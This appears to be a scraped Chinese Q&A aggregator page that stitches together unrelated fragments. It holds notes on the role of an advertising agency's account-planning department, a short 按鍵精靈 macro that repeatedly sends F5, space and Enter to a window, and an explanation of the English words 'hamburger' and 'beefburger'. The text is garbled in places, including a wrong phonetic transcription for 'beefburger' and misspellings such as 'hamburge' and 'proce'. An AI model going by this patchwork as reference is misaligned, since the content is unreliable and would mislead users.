• 在與營銷調查公司競爭這一方面，由於設置AP部門的廣告代理公司注重的不單單是數據的採集，而是對各種數據進行分析並靈活應用到廣告流程中來。AP制的廣告公司由此與市場調查公司區別開來，並在一定程度上形成了互相協作的關系。

2、理想的三角模式
• AP出現以前，廣告代理公司一般是客戶部門、創意部門、營銷部門、媒介部門的協作關系。
• 而當廣告公司整合營銷部門和媒介部中的策劃人員成立一個新的部門之後，廣告代理公司內部的主要框架就成了客戶部門、創意部門和AP部門的三角模式。這樣一來，他們三者之間既相輔相成，又相互牽制、監督。
• 客戶主管與AP人員共同商定營銷策略的設計。雖然營銷策略的最終決定權在客戶部門，但代表消費者的AP時刻監督客戶部門，以防止其不顧消費者內心感受，而妄自製定營銷策略。
• 創意人員和AP人員在創意開發階段也相互協作：AP人員一方面要為創意人員最大限度地提供創意靈感，而另一方面又要檢測創意雛形，對其擁有通過或否決的權力，在一定程度上約束著創意人員的想像力，以免創意人員過度追求廣告的藝術性，而忽視廣告的科學性和商業行為的本質。
• 客戶部代表本公司經常與廣告主打交道，來自廣告主和廣告公司雙方面的壓力頗使客戶部必須兼顧雙方的利益，遵守商業運作規則——利益至上，因此客戶部代表務實（practicality）的品質。
• 創意部門的特點在於突破人類想像的極限，開發出最具震撼力的廣告作品，所以它代表著豐富的想像力（imagination）。
• 而AP部門對數據的創造性分析和運用，對消費者內心感受的敏銳洞察，對創意靈感的無比敏感，到處都閃爍著智慧（intellect）的火花。
• 由務實（practicality）、豐富的想像力（imagination）和智慧（intellect）這三種品質所構成的項目調查小組在建立消費者與商品之間的情感紐帶方面顯示出獨特的優越性和非凡的有效性。
呵呵，我今晚才寫，搜到的這些。天涯

㈨ 按鍵精靈後台腳本

Hwnd = Plugin.Window.MousePoint()
While true
Call Plugin.Bkgnd.KeyPress(Hwnd, 116)
Delay 1000
Call Plugin.Bkgnd.KeyPress(Hwnd, 32)
Delay 1000
Call Plugin.Bkgnd.KeyPress(Hwnd, 13)
Delay 3000
Wend

試試這個，啟動的時候要把滑鼠放那個窗口。

㈩ 漢堡包用英語怎麼說

漢堡包的英文：hamburge、beefburger。具體釋義：

1、hamburger

英文發音：[ˈhæmbɜ:gə]

中文釋義：n. 漢堡包，漢堡；牛肉餅，肉餅；碎牛肉

例句：

She gave me half of her hamburger.

她把她那個漢堡包的一半給了我。

2、beefburger

英文發音：['bɛdbɝɡɚ]

中文釋義：n. 德式牛排；漢堡包

例句：

Minister John Gummer decided to feed his four-year-old daughter Cordelia a beefburger in front of the cameras.

約翰噶爾馬決定在攝像機面前以一個煎牛肉餅來招待他的四歲女兒考狄利婭。

(10)beef腳本使用擴展閱讀

hamburger和beefburger的區別：

1、具體含義不同

hamburger是廣義上的漢堡包，beefburger是狹義的漢堡包，指的是牛肉漢堡，同時，beefburger還含有牛肉、牛排的意思。

2、使用場合不同

hamburger偏口語，使用較廣泛，beefburger一般見於書面語。

例句：

'Why go out for hamburger when you have steak at home?' he once remarked.

紐曼曾經說道，「如果家裡有了牛排，為什麼要出去找漢堡？」

It takes 634 gallons of water to proce a 150g beefburger – compare this with 143 gallons to grow the same amount of tofu.

生產150克的牛肉需要消耗634加侖的水，而同樣生產150克的豆腐只需消耗143加侖的水。